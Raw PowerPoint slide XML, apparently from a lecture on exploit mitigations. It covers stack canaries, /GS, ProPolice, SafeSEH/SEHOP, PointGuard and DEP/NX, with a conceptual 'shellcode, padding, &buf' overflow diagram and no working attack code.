          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exception handler hijack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Code Examples:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://msdn.microsoft.com/en-us/library/aa290051(v=vs.71).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6726688" y="1905000"/>
            <a:ext cx="2188712" cy="1323439"/>
            <a:chOff x="5410200" y="1939782"/>
            <a:chExt cx="2188712" cy="1323439"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Right Brace 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5410200" y="2184231"/>
              <a:ext cx="381000" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">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5867400" y="1939782"/>
              <a:ext cx="1731512" cy="1323439"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                <a:t>ProPolice</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>puts arrays</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>above others</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
                <a:t>when possible</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5227292" y="3048000"/>
            <a:ext cx="1554508" cy="707886"/>
            <a:chOff x="5334000" y="3082782"/>
            <a:chExt cx="1554508" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Right Brace 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334000" y="3270612"/>
              <a:ext cx="381000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">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5793336" y="3082782"/>
              <a:ext cx="1095172" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                <a:t>SafeSEH</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>SEHOP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4271444" y="2112624"/>
            <a:ext cx="1900756" cy="400110"/>
            <a:chOff x="5334000" y="3240081"/>
            <a:chExt cx="1900756" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Right Brace 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334000" y="3249636"/>
              <a:ext cx="381000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">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4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5793336" y="3240081"/>
              <a:ext cx="1441420" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                <a:t>PointGuard</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6817795" y="3244793"/>
            <a:ext cx="2355608" cy="1022407"/>
            <a:chOff x="7062527" y="3111503"/>
            <a:chExt cx="2355608" cy="1022407"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Left Brace 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="8044970" y="2506762"/>
              <a:ext cx="390719" cy="1600201"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">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7062527" y="3426024"/>
              <a:ext cx="2355608" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                </a:rPr>
                <a:t>struct</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t> is fixed;</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>what about heap?</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Folded Corner 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537644" y="5791200"/>
            <a:ext cx="2281756" cy="777875"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>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bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VS 2003: /GS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16988102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3034508"/>
            <a:ext cx="8305800" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Execution Prevention (DEP) / </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eXecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (NX)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298160083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defeat exploits?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3276600"/>
            <a:ext cx="8229600" cy="2849563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>computation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="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17911933"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1028700" y="2515059"/>
          <a:ext cx="7086600" cy="518159"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3771900"/>
                <a:gridCol w="2209800"/>
                <a:gridCol w="1104900"/>
              </a:tblGrid>
              <a:tr h="36724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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>padding</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arc 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1028700" y="2085471"/>
            <a:ext cx="6591300" cy="883604"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7758"/>
              <a:gd name="adj2" fmla="val 1078451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8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6858000" y="3886659"/>
            <a:ext cx="1336798" cy="837741"/>
            <a:chOff x="7440229" y="3111503"/>
            <a:chExt cx="1600201" cy="837741"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Left Brace 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="8044970" y="2506762"/>
              <a:ext cx="390719" cy="1600201"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">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7606757" y="3426024"/>
              <a:ext cx="1267144" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
                <a:t>Canary</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="926247" y="3886659"/>
            <a:ext cx="2262308" cy="837741"/>
            <a:chOff x="7440231" y="3111503"/>
            <a:chExt cx="1600201" cy="837741"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Left Brace 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="8044972" y="2506762"/>
              <a:ext cx="390719" cy="1600201"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">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945840" y="3426024"/>
              <a:ext cx="588981" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
                <a:t>DEP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36984548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Execution Prevention</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="3398837"/>
            <a:ext cx="5105400" cy="2544763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mark stack as</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>non-executable</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>using NX bit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2475818166"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1028700" y="2515059"/>
          <a:ext cx="7086600" cy="518159"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3771900"/>
                <a:gridCol w="2209800"/>
                <a:gridCol w="1104900"/>
              </a:tblGrid>
              <a:tr h="36724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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>padding</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Arc 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1028700" y="2085471"/>
            <a:ext cx="6591300" cy="883604"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7758"/>
              <a:gd name="adj2" fmla="val 1078451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1643454" y="5577518"/>
            <a:ext cx="5857092" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r" defTabSz="457200">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(still </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a Denial-of-Service attack!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Explosion 1 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2743200"/>
            <a:ext cx="2590800" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="990000"/>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CRASH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
